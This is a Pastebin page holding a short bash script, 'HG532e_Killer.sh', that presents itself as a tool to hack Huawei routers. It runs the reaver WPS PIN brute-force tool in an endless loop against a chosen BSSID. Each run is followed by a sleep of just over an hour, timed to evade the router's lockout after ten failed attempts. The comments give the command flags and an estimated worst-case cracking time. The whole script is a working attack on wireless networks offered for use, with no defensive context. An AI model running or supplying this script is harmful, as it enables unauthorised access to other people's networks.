Advertisement
Guest User

HG532e_Killer.sh

a guest
Aug 10th, 2014
6,675
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.46 KB | None | 0 0
  1. #!/bin/bash
  2.  
  3. #this a tool to Hack HUAWEI routers
  4. #protection : 10 Fails attemps >> block WPS : 1h
  5. #HUAWEI ROUTER CAN DISABLE WPS / Change PIN
  6. #Max worse time To Take Down WPS PIN : 49 Days
  7. #CMD : reaver -b MAC -i interface -vv -N  -l 3603 -a
  8. #coded : Fantome195
  9. #HackshowTeam
  10.  
  11. if [ $# -ne 2 ] ;
  12.  
  13.  then
  14.  
  15. echo "\n      Usage : sh $0 BSSID interface   \n"
  16.  
  17. exit 0;
  18. fi
  19. while true;
  20.  
  21.  do
  22.  
  23. reaver -b $1 -i $2 -vv -N -g 10 -S -a
  24.  
  25. sleep 3603;
  26.  
  27. done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement